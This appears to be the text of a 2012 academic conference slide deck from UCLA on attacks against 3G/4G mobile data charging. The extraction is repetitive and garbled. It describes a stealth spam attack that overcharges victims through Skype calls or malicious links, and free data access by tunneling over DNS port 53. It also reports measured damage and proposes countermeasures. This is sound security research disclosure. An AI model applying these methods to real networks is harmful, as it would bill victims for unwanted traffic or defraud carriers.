MOBILE DATA CHARGING:

NEW ATTACKSNEW ATTACKSAND COUNTERMEASURESAND COUNTERMEASURES

Chunyi PengChunyi Peng, Chi-Yu Li, Guan-Hua Tu, Songwu Lu, Lixia Zhang

University of California, Los Angeles

ACM CCS’12

Mobile Data AccessACM CCS'12 C Peng (UCLA)

Mobile Data Access2

1.2 billion global users

Cellular NetworkCellular Network

Core N t k

InternetNetwork

Mobile Data ChargingACM CCS'12 C Peng (UCLA)

Mobile Data Charging3

Cellular NetworkInternet

Metered chargingbased on actual data usage,

Bill

e.g., $20/month for 300MB (AT&T)

Security:Security:Can any attack make the users pay MORE/LESS?Can any attack make the users pay MORE/LESS?

How Charging Works & Be SecuredACM CCS'12 C Peng (UCLA)

How Charging Works & Be Secured 4

C ll l N t kCellular NetworkAuthentication

Gateway#2 B th UL/DL ti h d

#1: Accounting @ core gateway only

InternetGateway…#2: Both UL/DL per connection charged

Accounting

NATPolicy

#3 P li d fi d b tBill

#3: Policy defined by operators

Two Security IssuesACM CCS'12 C Peng (UCLA)

Two Security Issues5

Authentication

NATNATBill

#1: Can the attacker bypass the security mechanism to exploit charging architecture loophole to make the Stealth-spam-attackg gusers pay MORE?

Stealth spam attack

#2: Can the attacker exploit charging policy to pay LESS?Toll-Free-Data-Access-Attack

Threat ModelsACM CCS'12 C Peng (UCLA)

Threat Models6

Cellular network is not compromised Charging subsystem works as designed Security mechanism works as designed

Attacker’s capabilityO l i t ll d @ bil Only use installed apps @ mobile, or

Deploy malicious servers outside cellular networks

OutlineACM CCS'12 C Peng (UCLA)

Outline7

S l h k ( O ) Stealth-spam-attack (pay MORE) Vulnerability Attack design & implementation & damage Countermeasures & insight

Toll-free-data-access-attack (pay LESS) Vulnerability Attack design & implementation & damage

i i h Countermeasures & insight

Summary Summary

Stealth-Spam-Attack8

Security Against SpammingACM CCS'12 C Peng (UCLA)

Security Against Spamming9

Authentication

Outgoing-SpamOutgoing-SpamCan security mechanism (e.g., NAT/Firewalls) block incoming

Incoming-Spamspam?

NAT

g pOutgoing-Spam due to malwares@mobile or spoofing.

•Private IP addr. is not accessible•Access allowed only when initiatedNAT

BillSimple, not addressed here.

Access allowed only when initiated by the mobile

Bill

VulnerabilityACM CCS'12 C Peng (UCLA)

Vulnerability

Authentication① i d i

Different from conventional spamming, ① Init a data service e.g., Email/SMS spam

Unawareness (stealthy) L li d (l ti h l )② Incoming traffic② Incoming Spam

① trap the victim to open data access✔ ✗Spam from the attackerLong-lived (lasting hours or longer)

10 E attacker② Incoming Spam time

Data Services (charged)✗

(normal)

(attacked) Actual charging time window10

NATE-attacker(attacked) g g

Bill

Stealth-Spam-AttackACM CCS'12 C Peng (UCLA)

Stealth Spam Attack11

Step1-Trap: init data accessExample-1: click a malicious web linkpExample-2: login Skype once / stay online

Step2-Spam: keep spammingNo matter what status @mobile

Web-based AttackACM CCS'12 C Peng (UCLA)

Web based Attack12

Implementation Phone: click a malicious web link Attacker (server): send spam data at constant rate

(disable TCP congest control and tear-down)( g )

Result: charging keeps going Result: charging keeps going Even after the phone tears down TCP TCP FIN, timeout

Even when many “TCP RESET” sent from the mobile

Damage vs Spamming RateACM CCS'12 C Peng (UCLA)

Damage vs. Spamming Rate13

Ch i l iCharging volume vs. spamming rate

Operator-I Operator-II

In proportion to spamming rate when rate is lowCh i bl k d h i hi h ( 1Mb )Charging blocked when rate is high (> 1Mbps)

The charged volume could be > the received one [Mobicom’12]

Damage vs DurationACM CCS'12 C Peng (UCLA)

Damage vs. Duration14

Spamming rate = 150Kbps

No observed sign to end when the attack lasts 2No observed sign to end when the attack lasts 2 hours if the rate is low (spamming> 120MB)

Skype-based AttackACM CCS'12 C Peng (UCLA)

Skype based Attack15

I l t ti Implementation Phone: do nothing (stay online once in Skype) Attacker: Skype call the victim and hang up Attacker: Skype call the victim and hang up Attacker (server): send spam data at constant rate

Exploit Skype “loophole” allows data access from the host who attempts to call allows data access from the host who attempts to call

the victim before the attempt is accepted

Demo

Demo: for a specific victimACM CCS'12 C Peng (UCLA)

Demo: for a specific victim16

Result: charging keeps going Even after Skype logout Even after Skype logoutEven when there is no any skype call session

E h “ICMP h bl ” t f Even when many “ICMP unreachable” sent from the mobile

Damage vs Spamming RateACM CCS'12 C Peng (UCLA)

Damage vs. Spamming Rate17

Ch i l iCharging volume vs. spamming rate

Operator-I Operator-II

No bounds on spamming rate compared with TCP-based attack

Damage vs DurationACM CCS'12 C Peng (UCLA)

Damage vs. Duration18

Spamming rate = 50Kbps

No observed sign to end when the attackNo observed sign to end when the attack lasts 24 hours (spamming > 500MB)

Root CauseACM CCS'12 C Peng (UCLA)

Root Cause19

① i d i

Current system: Secure only the initialization

IP forwarding can push packets to the victim (not

① Init a data service

② I i S

controlled by the victim)

#1: Initial authentication ≠ authentication all along② Incoming Spam

① trap the victim to open data access

#1: Initial authentication ≠ authentication all along

Current system: K h i if d t

Different views @ mobile: d t d t t

E attacker

① trap the victim to open data accessKeep charging if data comesLocal view @ core gateway

data conn. ends or never starts or exception happensLack of feedback/control

NATE-attackerLack of feedback/control

#2: Data flow termination @ the phone≠ h i i i @ hBill≠ charging termination @ the operator

CountermeasuresACM CCS'12 C Peng (UCLA)

Countermeasures20

i i i bl d h d l Spamming inevitable due to IP push model

Remedy: stop early when spamming happensDetection of unwanted traffic @mobile/operatorDetection of unwanted traffic @mobile/operator Feedback (esp. from the mobile to the operator)At least allow users to stop data charging (no service)At least allow users to stop data charging (no service) Exploit/design mechanisms in cellular networks: implicit-

block, explicit-allow, explicit-stopp p p

Precaution, e.g., set a volume limit, g ,Application: be aware of spamming attack

Toll-Free-Data-Access-Attack21

VulnerabilityACM CCS'12 C Peng (UCLA)

Vulnerability22

Both operators provide free DNS service

DNS packets #1: free fake DNS loopholeReal data over 53

Policy:

DNS packets

DNS flow ID: (srcIP, destIP, srcPort, d tP t t l)

#1: free fake DNS loopholeOP-I: Free via port 53OP II: Free via UDP+Port 53

Real data over 53

Policy: Free DNS Service

Bill (DNS) 0

destPort, protocol)OP-I: Packets via port 53 are freeOP II P k t i UDP+P t 53 f

#2: no volume-check loopholeOP-II: Free via UDP+Port 53

Bill (DNS) = 0

Bill (ANY-on-DNS) = 0

OP-II: Packets via UDP+Port 53 freeAny enforcement for packets over port 53?Bill (ANY on-DNS) 0 p

OP-I: no observed limits, except 29KB for one request packet

OP-II: no observed limits

Toll-Free-Data-Access-AttackACM CCS'12 C Peng (UCLA)

Toll Free Data Access Attack23

P t id ll l t k Proxy outside cellular network Tunneling over 53 between the mobile and external

network similar to calling 800-hotline

Implementation Implementation HTTP-proxy on port 53 (only for web, OP-I) Sock-proxy on port 53 (for more apps, OP-I) Sock proxy on port 53 (for more apps, OP I) DNS-tunneling on UDP-53 (all apps, OP-I, II)

Results Free data access > 200MB, no sign of limits

D if i t t d Demo if interested

CountermeasuresACM CCS'12 C Peng (UCLA)

Countermeasures24

Simplest fix: stop free DNS serviceOP-II stopped it since this Julypp y

O h i Other suggestionsAuthenticate DNS serviceOnly allow using authenticated DNS resolversDNS message integrity checkg g y

Provide free DNS quota

Beyond DNSACM CCS'12 C Peng (UCLA)

Beyond DNS25

i i li l i di Existing DNS tunneling tools: iodine etc,Designed for data access when Internet access is

blocked

differentiated-charging policydifferentiated-charging policye.g., free access to one website/ via some APN, or cheaper VoIP than Web

Incentive to pay less(A )

Gap bt polic and its enforcement

(Attackers or even normal users)

Bill Gap btw policy and its enforcementBullet-proof design & practice

On IncentiveACM CCS'12 C Peng (UCLA)

On Incentive26

Toll-Free-Data-Access-Attack ✔

Stealth-Spam-AttackGood news: no obvious and strong incentiveNo immediate gain for the attacker unless the ill-

intentioned operator does itMonetary loss against the attacker’s adversaryUnexpected incentive in the future?

SummaryMore information/demo in h // l d / j h l

ACM CCS'12 C Peng (UCLA)

Summary27

A th l bilit f 3G/4G d t h i

http://metro.cs.ucla.edu/projects.html

Assess the vulnerability of 3G/4G data charging systemTwo t pes of attacks Two types of attacks, Toll-free-data-access-attack (free > 200MB) Enforcement of differentiated-charging policy Enforcement of differentiated-charging policy

Stealth-spam-attack (overcharging > 500MB) Rooted in charging architecture, security mechanism and IP

model No observed volume limitsInsight Insight IP push model is not ready for metered-charging Feedback or control needed during data charging Feedback or control needed during data charging Differentiated-charging policy has to secure itself